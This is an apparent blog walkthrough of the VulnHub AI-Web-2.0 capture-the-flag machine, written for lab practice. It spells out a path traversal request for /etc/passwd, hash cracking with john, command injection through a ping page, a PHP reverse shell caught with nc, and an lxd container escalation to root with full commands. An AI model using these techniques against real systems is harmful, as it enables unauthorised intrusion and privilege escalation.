Vulnhub Al-Web-2.0 Walkthrough

Scanning the box with nmap –A –T4 –p- –vv

Scan with dirb /usr/share/dirb/wordlists/big.txt

Also with –X .php

Then go to /signup.php pick a name and login with it:

Now according to searchsploit the XuezhuLi FileSharing got two exploits, the one we need it 40009.txt

And when we view it and read it, it’s easy to put it to work, with the need of BurpSuite of course

Open Burpsuite and capture the page then send it to repeater and add this part to the header

GET /viewing.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1

So now we got on the right is the passwd file with the users names and we got two n0nr00tuser and aiweb2

Let’s download the .htpasswd file from apache2:


using john to decrypt the hash

john –wordlist= rockyou-45.txt /root/hash.txt

So the hash is c.ronaldo now we login at as aiwed2admin and the password c.ronaldo

Ok so we write /robots.txt

We got two directories /H05Tpin9555/ /S0mextras/

 The page H05Tpin955 is a ping page where you can ping any IP, I tried the use of && and ; but didn’t work so I googled it and  according to this site you can use ||with id and ls along with the ping command:

Now we can upload a shell script and get a connection to our machine:

Just a small note the file php-reverse-shell.php had to rename it to shell.php otherwise it won’t work, anyway it’s uploaded and now we call it from while we have nc –lvp 4444 on our machine ready to receive it.

Still on other directory we didn’t see what’s inside of it /S0mextra so let’s visit it:

User: n0nr00tuser Cred: zxowieoi4sdsadpEClDws1sf let’s login it with ssh:

The user is part of lxd, and the host is running Ubuntu 18.04 which is vulnerable to lxd ( searchsploit lxd ), so we going to download lxd-alpine-builder from here and follow these steps.

On our machine inside the lxd folder we run:

sudo ./build-alpine

sudo ./build-alpine -h

Then on the host machine we run this:

lxc image import alpine-v3.3-x86_64-20160114_2308.tar.gz –alias myimage

lxc image list

lxc init myimage hacker -c security.privileged=true

lxc config device add hacker mydevice disk source=/ path=/mnt/root recursive=true

lxc start hacker

lxc exec hacker /bin/sh

Now we are root head to /mnt/root/root/ and catch the flag

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s